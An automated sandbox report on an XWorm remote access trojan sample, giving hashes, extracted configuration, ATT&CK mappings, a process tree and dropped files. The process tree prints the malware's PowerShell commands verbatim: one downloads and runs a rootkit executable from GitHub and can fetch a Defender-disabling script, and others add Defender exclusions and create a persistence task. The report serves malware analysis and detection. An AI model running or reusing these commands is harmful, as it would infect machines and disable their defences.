xworm | 03cc93bdaefa6e5db157062dd90b796ff6a8f2f172e3be278e604ba9808f9ce4

Analysis

max time kernel
10s
max time network
23s
platform
windows10-2004_x64
resource
win10v2004-20250217-en
resource tags

arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
submitted
05/03/2025, 13:23

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

BootstrapperNew.exe
Size

2.9MB
MD5

2326d97462601f0bf84459a19a23a307
SHA1

b6d153b9984ad82202997707fe5e4fd135d3afb6
SHA256

03cc93bdaefa6e5db157062dd90b796ff6a8f2f172e3be278e604ba9808f9ce4
SHA512

fccf56201ca30da42c15d769a1af38d87f8bdc0562327096893e81738ad7a4a7e3c00cb425144e1ffa10d9e0e0f39fdd7e5287f74f88e4aa971aa3cc3e988568
SSDEEP

49152:fCPqFzmYUMGs67ueIJdjo+fR60CqtZ4HdBJqlCmir3C7uXwonp1UECFgBT:f/DXVAu/kE69HHdB8lnirSSJqE+gT

Score

10^/10

xworm defense_evasion discovery execution persistence rat trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe

exe.dropper

https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat

Extracted

Family

xworm

Attributes

Install_directory
%port%
install_file
svchost.exe
pastebin_url
https://pastebin.com/raw/J42c6s7r

Signatures

Detect Xworm Payload 3 IoCs

resource	yara_rule
behavioral2/files/0x0019000000023d01-15.dat	family_xworm
behavioral2/memory/3676-23-0x0000000000010000-0x0000000000024000-memory.dmp	family_xworm
behavioral2/memory/3676-714-0x000000001BD10000-0x000000001BD22000-memory.dmp	family_xworm

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 2484 created 620	2484	MasonRootkit.exe	5

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 2 IoCs

flow	pid	Process
9	100	powershell.exe
12	100	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
100	powershell.exe

Downloads MZ/PE file 1 IoCs

flow	pid	Process
12	100	powershell.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Control Panel\International\Geo\Nation	Local Security Authority Process.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Control Panel\International\Geo\Nation	MasonRootkit.exe

Executes dropped EXE 4 IoCs

pid	Process
3512	BootstrapperNew.exe
3676	Local Security Authority Process.exe
2852	MasonRootkit.exe
2484	MasonRootkit.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Local Security Authority Process = "C:\\Users\\Admin\\AppData\\Roaming\\Local Security Authority Process.exe"	Local Security Authority Process.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
32	raw.githubusercontent.com
11	raw.githubusercontent.com
12	raw.githubusercontent.com
14	pastebin.com
16	pastebin.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2484 set thread context of 856	2484	MasonRootkit.exe	100

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Local Security Authority Process.exe	BootstrapperNew.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
4356	timeout.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2508	schtasks.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
5004	powershell.exe
5004	powershell.exe
100	powershell.exe
100	powershell.exe
2484	MasonRootkit.exe
856	dllhost.exe
856	dllhost.exe
856	dllhost.exe
856	dllhost.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	3676	Local Security Authority Process.exe
Token: SeDebugPrivilege	5004	powershell.exe
Token: SeDebugPrivilege	100	powershell.exe
Token: SeDebugPrivilege	2484	MasonRootkit.exe
Token: SeDebugPrivilege	2484	MasonRootkit.exe
Token: SeDebugPrivilege	856	dllhost.exe

Suspicious use of WriteProcessMemory 43 IoCs

description	pid	Process	procid_target
PID 4244 wrote to memory of 5004	4244	BootstrapperNew.exe	84
PID 4244 wrote to memory of 5004	4244	BootstrapperNew.exe	84
PID 4244 wrote to memory of 5004	4244	BootstrapperNew.exe	84
PID 4244 wrote to memory of 3512	4244	BootstrapperNew.exe	86
PID 4244 wrote to memory of 3512	4244	BootstrapperNew.exe	86
PID 4244 wrote to memory of 3676	4244	BootstrapperNew.exe	87
PID 4244 wrote to memory of 3676	4244	BootstrapperNew.exe	87
PID 3676 wrote to memory of 100	3676	Local Security Authority Process.exe	88
PID 3676 wrote to memory of 100	3676	Local Security Authority Process.exe	88
PID 100 wrote to memory of 2852	100	powershell.exe	91
PID 100 wrote to memory of 2852	100	powershell.exe	91
PID 3676 wrote to memory of 2508	3676	Local Security Authority Process.exe	92
PID 3676 wrote to memory of 2508	3676	Local Security Authority Process.exe	92
PID 2852 wrote to memory of 2484	2852	MasonRootkit.exe	97
PID 2852 wrote to memory of 2484	2852	MasonRootkit.exe	97
PID 2852 wrote to memory of 4892	2852	MasonRootkit.exe	98
PID 2852 wrote to memory of 4892	2852	MasonRootkit.exe	98
PID 2484 wrote to memory of 856	2484	MasonRootkit.exe	100
PID 2484 wrote to memory of 856	2484	MasonRootkit.exe	100
PID 2484 wrote to memory of 856	2484	MasonRootkit.exe	100
PID 2484 wrote to memory of 856	2484	MasonRootkit.exe	100
PID 2484 wrote to memory of 856	2484	MasonRootkit.exe	100
PID 2484 wrote to memory of 856	2484	MasonRootkit.exe	100
PID 2484 wrote to memory of 856	2484	MasonRootkit.exe	100
PID 2484 wrote to memory of 856	2484	MasonRootkit.exe	100
PID 2484 wrote to memory of 856	2484	MasonRootkit.exe	100
PID 2484 wrote to memory of 856	2484	MasonRootkit.exe	100
PID 2484 wrote to memory of 856	2484	MasonRootkit.exe	100
PID 2484 wrote to memory of 856	2484	MasonRootkit.exe	100
PID 2484 wrote to memory of 856	2484	MasonRootkit.exe	100
PID 856 wrote to memory of 620	856	dllhost.exe	5
PID 856 wrote to memory of 684	856	dllhost.exe	7
PID 856 wrote to memory of 956	856	dllhost.exe	12
PID 856 wrote to memory of 64	856	dllhost.exe	13
PID 4892 wrote to memory of 4356	4892	cmd.exe	101
PID 4892 wrote to memory of 4356	4892	cmd.exe	101
PID 856 wrote to memory of 740	856	dllhost.exe	14
PID 684 wrote to memory of 2624	684	lsass.exe	45
PID 856 wrote to memory of 952	856	dllhost.exe	15
PID 856 wrote to memory of 1108	856	dllhost.exe	17
PID 856 wrote to memory of 1116	856	dllhost.exe	18
PID 856 wrote to memory of 1176	856	dllhost.exe	19
PID 856 wrote to memory of 1188	856	dllhost.exe	20

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:620
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:64
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{4ce64734-abab-4774-aa1d-2e3f29735d13}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:856
- C:\Windows\system32\LogonUI.exe
  "LogonUI.exe" /flags:0x4 /state0:0xa39bb055 /state1:0x41c64e6d
  2⤵
  PID:1660

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:684

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:956

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:740

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:952

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1108

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1116

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1176

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1188

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2624

C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
"C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
1⤵
- Checks computer location settings
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4244
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAaQB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AZQB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAaAB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGoAeABiACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5004
- C:\Users\Admin\AppData\Local\BootstrapperNew.exe
  "C:\Users\Admin\AppData\Local\BootstrapperNew.exe"
  2⤵
  - Executes dropped EXE
  PID:3512
- C:\Windows\Local Security Authority Process.exe
  "C:\Windows\Local Security Authority Process.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3676
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP + '\' + $randomString + '.bat'); Start-Process -FilePath ($env:TEMP + '\' + $randomString + '.bat') -WindowStyle Hidden -Wait -Verb RunAs; }; if ($settings.adminrun) { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath -Verb RunAs; } else { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath; }"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:100
  - - C:\Users\Admin\AppData\Local\Temp\MasonRootkit.exe
      "C:\Users\Admin\AppData\Local\Temp\MasonRootkit.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:2852
    - - C:\ProgramData\MasonRootkit.exe
        
        "C:\ProgramData\MasonRootkit.exe"
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2484
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpD06F.tmp.bat""
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4892
      - C:\Windows\system32\timeout.exe
        
        timeout 3
        6⤵
        Delays execution with timeout.exe
        
        PID:4356
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "Local Security Authority Process" /tr "C:\Users\Admin\AppData\Roaming\Local Security Authority Process.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2508
- - C:\Windows\SYSTEM32\shutdown.exe
    shutdown.exe /f /s /t 0
    3⤵
    PID:6104

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\MasonRootkit.exe

Filesize
596KB

MD5
bb2fd6c1b233fd2f08a6a43ef860bcb6

SHA1
1cd9ea091bc0d7f907fcd8cf8c8b9d3187e6dc04

SHA256
8c4cddfb3723ecf013526733f93bd5f4408bc463c6a28ccb41b3fb63504ee9ce

SHA512
2ee649cf68e5121bd4ad3e51bdf0c71d773a8d0c67ce262356156b312221285bf62409ac2e2c5c5748adc31d3c94b24777f2918bdb9fcf488c61b0e2c6dc50b5

Download Submit
C:\Users\Admin\AppData\Local\BootstrapperNew.exe

Filesize
2.9MB

MD5
f227cdfd423b3cc03bb69c49babf4da3

SHA1
3db5a97d9b0f2545e7ba97026af6c28512200441

SHA256
cb5d6c1ca0aa6232a2d55e14b20ac4a9945a0bd063c57d60a5ed3ae94160e3e8

SHA512
b10afd03b02a928545c16fad39a6ae46b68b1e1a2477a6990803ce80008e7161fb2ebc9380ba15a1b074bb436aa34bcd6c94a922933d438b1c22489717e1e10e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\MasonRootkit.exe.log

Filesize
1KB

MD5
3982d6d16fd43ae609fd495bb33433a2

SHA1
6c33cd681fdfd9a844a3128602455a768e348765

SHA256
9a0a58776494250224706cbfbb08562eec3891fb988f17d66d0d8f9af4253cf9

SHA512
4b69315f5d139b8978123bebd417231b28f86b6c1433eb88105465a342339c6c6b8c240a2ca8d2a9c1fca20136c8c167b78a770ab0664231f6e1742291cbf1aa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7446d8ced64a2dbc337827fc1de29824

SHA1
53415867dc152a8fa3acb2e55a6c0696f60b8a25

SHA256
abf04423d7deddbaf09c777b529cb7755a8e0f40ff0135d6a7a669b6a6f9a4f7

SHA512
460e26ef6388dd2dc7dce1af96b164a275cb6751930035955af02d12916dbf4e960929a0b4fedb3419445f23690fb71388eac4ed263d06601f7cd873f6656e79

Download Submit
C:\Users\Admin\AppData\Local\Temp\MasonRootkit.exe

Filesize
612KB

MD5
5e1eb1a67d40ccae40dee2a037ca6c64

SHA1
786b54d3d451ea40faeeb20fd30a38744862eeb5

SHA256
80e5cb11ae2512da3b7be501b469d6fc1a69a2017a143b9897023da9e366325f

SHA512
0484da209f0c8edff5d1f08b841f3134008ff72fb563fa48a15f96c8ad23fdfb82cc8a59bc729f2db3d359e18558d6f4fbaf4b40955a38787472db438a043205

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zwlnocxm.dxy.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpD06F.tmp.bat

Filesize
164B

MD5
af21891fe9730c895cb43f493c9a23d0

SHA1
c9ea4ea8e9079c557a6bffb0d231e374fa91cf9d

SHA256
b7645b83e151769a8f789cb1c1dd9eefd8208a4e7ad09e8b258da3de770da856

SHA512
cd2e0aac3564683c3b5c268dcb1798b90d9f4a382b481a4943d9685f710e4a8d219d240c52cebb77dbeb3a68c4288a8f8d17546cd84b2975b93facbce6310297

Download Submit
C:\Windows\Local Security Authority Process.exe

Filesize
55KB

MD5
cc170e6bb05ddb76e910e86ebb984d3c

SHA1
3a7473e8d705754257ae685db2d9a0f125a814aa

SHA256
b93f4dcb4b2b68370c18e6a7df1ea4d2c588826d6712d8e1493955c81735718b

SHA512
0d1b32949e6e3fd398b9ca783eabe870e807985958018036f1a0880870d8649dd31c13a8723e32a1a8869c6c7646f1e64a4d10fbcc73ffa4829aaf8ffd3fe28a

Download Submit
memory/64-166-0x0000027DA69E0000-0x0000027DA6B9B000-memory.dmp

Filesize
1.7MB

Download
memory/64-162-0x0000027DA69E0000-0x0000027DA6B9B000-memory.dmp

Filesize
1.7MB

Download
memory/64-167-0x00007FFF7F0D0000-0x00007FFF7F0E0000-memory.dmp

Filesize
64KB

Download
memory/64-164-0x0000027DA69E0000-0x0000027DA6B9B000-memory.dmp

Filesize
1.7MB

Download
memory/64-165-0x0000027DA69E0000-0x0000027DA6B9B000-memory.dmp

Filesize
1.7MB

Download
memory/64-163-0x0000027DA69E0000-0x0000027DA6B9B000-memory.dmp

Filesize
1.7MB

Download
memory/100-85-0x00000244B1920000-0x00000244B1AE2000-memory.dmp

Filesize
1.8MB

Download
memory/100-87-0x00000244B2020000-0x00000244B2548000-memory.dmp

Filesize
5.2MB

Download
memory/100-69-0x00000244B1120000-0x00000244B1142000-memory.dmp

Filesize
136KB

Download
memory/620-146-0x0000014357740000-0x00000143578FB000-memory.dmp

Filesize
1.7MB

Download
memory/620-147-0x0000014357740000-0x00000143578FB000-memory.dmp

Filesize
1.7MB

Download
memory/620-144-0x0000014355B70000-0x0000014355CAE000-memory.dmp

Filesize
1.2MB

Download
memory/620-148-0x0000014357740000-0x00000143578FB000-memory.dmp

Filesize
1.7MB

Download
memory/620-150-0x00007FFF7F0D0000-0x00007FFF7F0E0000-memory.dmp

Filesize
64KB

Download
memory/620-145-0x0000014357740000-0x00000143578FB000-memory.dmp

Filesize
1.7MB

Download
memory/620-149-0x0000014357740000-0x00000143578FB000-memory.dmp

Filesize
1.7MB

Download
memory/684-158-0x00007FFF7F0D0000-0x00007FFF7F0E0000-memory.dmp

Filesize
64KB

Download
memory/684-157-0x0000019630DE0000-0x0000019630F9B000-memory.dmp

Filesize
1.7MB

Download
memory/684-155-0x0000019630DE0000-0x0000019630F9B000-memory.dmp

Filesize
1.7MB

Download
memory/684-156-0x0000019630DE0000-0x0000019630F9B000-memory.dmp

Filesize
1.7MB

Download
memory/684-154-0x0000019630DE0000-0x0000019630F9B000-memory.dmp

Filesize
1.7MB

Download
memory/684-153-0x0000019630DE0000-0x0000019630F9B000-memory.dmp

Filesize
1.7MB

Download
memory/740-179-0x000002112FB40000-0x000002112FCFB000-memory.dmp

Filesize
1.7MB

Download
memory/740-182-0x00007FFF7F0D0000-0x00007FFF7F0E0000-memory.dmp

Filesize
64KB

Download
memory/740-181-0x000002112FB40000-0x000002112FCFB000-memory.dmp

Filesize
1.7MB

Download
memory/740-180-0x000002112FB40000-0x000002112FCFB000-memory.dmp

Filesize
1.7MB

Download
memory/740-177-0x000002112FB40000-0x000002112FCFB000-memory.dmp

Filesize
1.7MB

Download
memory/740-178-0x000002112FB40000-0x000002112FCFB000-memory.dmp

Filesize
1.7MB

Download
memory/856-136-0x0000000140000000-0x00000001401A1000-memory.dmp

Filesize
1.6MB

Download
memory/856-141-0x0000000140000000-0x00000001401A1000-memory.dmp

Filesize
1.6MB

Download
memory/856-139-0x00007FFFBF050000-0x00007FFFBF245000-memory.dmp

Filesize
2.0MB

Download
memory/856-140-0x00007FFFBE150000-0x00007FFFBE20E000-memory.dmp

Filesize
760KB

Download
memory/856-137-0x0000000140000000-0x00000001401A1000-memory.dmp

Filesize
1.6MB

Download
memory/952-194-0x00007FFF7F0D0000-0x00007FFF7F0E0000-memory.dmp

Filesize
64KB

Download
memory/952-193-0x000001600F000000-0x000001600F1BB000-memory.dmp

Filesize
1.7MB

Download
memory/952-189-0x000001600F000000-0x000001600F1BB000-memory.dmp

Filesize
1.7MB

Download
memory/952-190-0x000001600F000000-0x000001600F1BB000-memory.dmp

Filesize
1.7MB

Download
memory/952-191-0x000001600F000000-0x000001600F1BB000-memory.dmp

Filesize
1.7MB

Download
memory/952-192-0x000001600F000000-0x000001600F1BB000-memory.dmp

Filesize
1.7MB

Download
memory/956-171-0x000002977AA10000-0x000002977ABCB000-memory.dmp

Filesize
1.7MB

Download
memory/956-170-0x000002977AA10000-0x000002977ABCB000-memory.dmp

Filesize
1.7MB

Download
memory/956-172-0x000002977AA10000-0x000002977ABCB000-memory.dmp

Filesize
1.7MB

Download
memory/956-169-0x000002977AA10000-0x000002977ABCB000-memory.dmp

Filesize
1.7MB

Download
memory/956-174-0x00007FFF7F0D0000-0x00007FFF7F0E0000-memory.dmp

Filesize
64KB

Download
memory/956-173-0x000002977AA10000-0x000002977ABCB000-memory.dmp

Filesize
1.7MB

Download
memory/1108-198-0x000002179AE80000-0x000002179B03B000-memory.dmp

Filesize
1.7MB

Download
memory/1108-196-0x000002179AE80000-0x000002179B03B000-memory.dmp

Filesize
1.7MB

Download
memory/1108-197-0x000002179AE80000-0x000002179B03B000-memory.dmp

Filesize
1.7MB

Download
memory/2484-128-0x000001F8C3DE0000-0x000001F8C3E7A000-memory.dmp

Filesize
616KB

Download
memory/2484-134-0x00007FFFBE150000-0x00007FFFBE20E000-memory.dmp

Filesize
760KB

Download
memory/2484-133-0x00007FFFBF050000-0x00007FFFBF245000-memory.dmp

Filesize
2.0MB

Download
memory/2852-112-0x0000000002D40000-0x0000000002DD8000-memory.dmp

Filesize
608KB

Download
memory/2852-111-0x0000000000A90000-0x0000000000B30000-memory.dmp

Filesize
640KB

Download
memory/3512-52-0x000001EE1EAC0000-0x000001EE1EACA000-memory.dmp

Filesize
40KB

Download
memory/3512-44-0x000001EE1AF30000-0x000001EE1AF40000-memory.dmp

Filesize
64KB

Download
memory/3512-55-0x000001EE1EB30000-0x000001EE1EB46000-memory.dmp

Filesize
88KB

Download
memory/3512-54-0x000001EE1EB20000-0x000001EE1EB28000-memory.dmp

Filesize
32KB

Download
memory/3512-53-0x000001EE1EAE0000-0x000001EE1EB06000-memory.dmp

Filesize
152KB

Download
memory/3512-50-0x000001EE7EB70000-0x000001EE7EB7E000-memory.dmp

Filesize
56KB

Download
memory/3512-22-0x00007FFFA0E83000-0x00007FFFA0E85000-memory.dmp

Filesize
8KB

Download
memory/3512-24-0x000001EE7E4C0000-0x000001EE7E7A2000-memory.dmp

Filesize
2.9MB

Download
memory/3512-604-0x000001EE7FA10000-0x000001EE7FA20000-memory.dmp

Filesize
64KB

Download
memory/3512-131-0x00007FFFA0E83000-0x00007FFFA0E85000-memory.dmp

Filesize
8KB

Download
memory/3512-32-0x000001EE7FA10000-0x000001EE7FA20000-memory.dmp

Filesize
64KB

Download
memory/3512-49-0x000001EE7EBB0000-0x000001EE7EBE8000-memory.dmp

Filesize
224KB

Download
memory/3512-46-0x000001EE7EB50000-0x000001EE7EB58000-memory.dmp

Filesize
32KB

Download
memory/3512-51-0x000001EE1F180000-0x000001EE1F280000-memory.dmp

Filesize
1024KB

Download
memory/3512-57-0x000001EE1EAD0000-0x000001EE1EADA000-memory.dmp

Filesize
40KB

Download
memory/3512-56-0x000001EE1EB10000-0x000001EE1EB1A000-memory.dmp

Filesize
40KB

Download
memory/3512-58-0x000001EE7EB80000-0x000001EE7EB88000-memory.dmp

Filesize
32KB

Download
memory/3676-114-0x00007FFFA0E80000-0x00007FFFA1941000-memory.dmp

Filesize
10.8MB

Download
memory/3676-25-0x00007FFFA0E80000-0x00007FFFA1941000-memory.dmp

Filesize
10.8MB

Download
memory/3676-23-0x0000000000010000-0x0000000000024000-memory.dmp

Filesize
80KB

Download
memory/3676-714-0x000000001BD10000-0x000000001BD22000-memory.dmp

Filesize
72KB

Download
memory/3676-786-0x00007FFFA0E80000-0x00007FFFA1941000-memory.dmp

Filesize
10.8MB

Download
memory/3676-115-0x000000001ADB0000-0x000000001ADC0000-memory.dmp

Filesize
64KB

Download
memory/5004-88-0x0000000007490000-0x0000000007526000-memory.dmp

Filesize
600KB

Download
memory/5004-71-0x0000000074A60000-0x0000000074AAC000-memory.dmp

Filesize
304KB

Download
memory/5004-70-0x00000000064B0000-0x00000000064E2000-memory.dmp

Filesize
200KB

Download
memory/5004-81-0x0000000006520000-0x000000000653E000-memory.dmp

Filesize
120KB

Download
memory/5004-82-0x00000000070E0000-0x0000000007183000-memory.dmp

Filesize
652KB

Download
memory/5004-48-0x0000000005F20000-0x0000000005F6C000-memory.dmp

Filesize
304KB

Download
memory/5004-47-0x0000000005F00000-0x0000000005F1E000-memory.dmp

Filesize
120KB

Download
memory/5004-83-0x00000000078B0000-0x0000000007F2A000-memory.dmp

Filesize
6.5MB

Download
memory/5004-45-0x0000000005A50000-0x0000000005DA4000-memory.dmp

Filesize
3.3MB

Download
memory/5004-84-0x0000000007200000-0x000000000721A000-memory.dmp

Filesize
104KB

Download
memory/5004-86-0x0000000007290000-0x000000000729A000-memory.dmp

Filesize
40KB

Download
memory/5004-34-0x00000000058E0000-0x0000000005946000-memory.dmp

Filesize
408KB

Download
memory/5004-33-0x0000000005870000-0x00000000058D6000-memory.dmp

Filesize
408KB

Download
memory/5004-31-0x0000000073470000-0x0000000073C20000-memory.dmp

Filesize
7.7MB

Download
memory/5004-30-0x0000000004F20000-0x0000000004F42000-memory.dmp

Filesize
136KB

Download
memory/5004-27-0x0000000004B90000-0x0000000004BA0000-memory.dmp

Filesize
64KB

Download
memory/5004-28-0x000000007347E000-0x000000007347F000-memory.dmp

Filesize
4KB

Download
memory/5004-29-0x00000000051D0000-0x00000000057F8000-memory.dmp

Filesize
6.2MB

Download
memory/5004-26-0x0000000002900000-0x0000000002936000-memory.dmp

Filesize
216KB

Download
memory/5004-89-0x0000000004C70000-0x0000000004C81000-memory.dmp

Filesize
68KB

Download
memory/5004-90-0x0000000007470000-0x000000000747E000-memory.dmp

Filesize
56KB

Download
memory/5004-91-0x0000000007530000-0x0000000007544000-memory.dmp

Filesize
80KB

Download
memory/5004-92-0x0000000007570000-0x000000000758A000-memory.dmp

Filesize
104KB

Download
memory/5004-93-0x0000000007550000-0x0000000007558000-memory.dmp

Filesize
32KB

Download
memory/5004-97-0x0000000073470000-0x0000000073C20000-memory.dmp

Filesize
7.7MB

Download

Analysis

Sharing

Errors

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads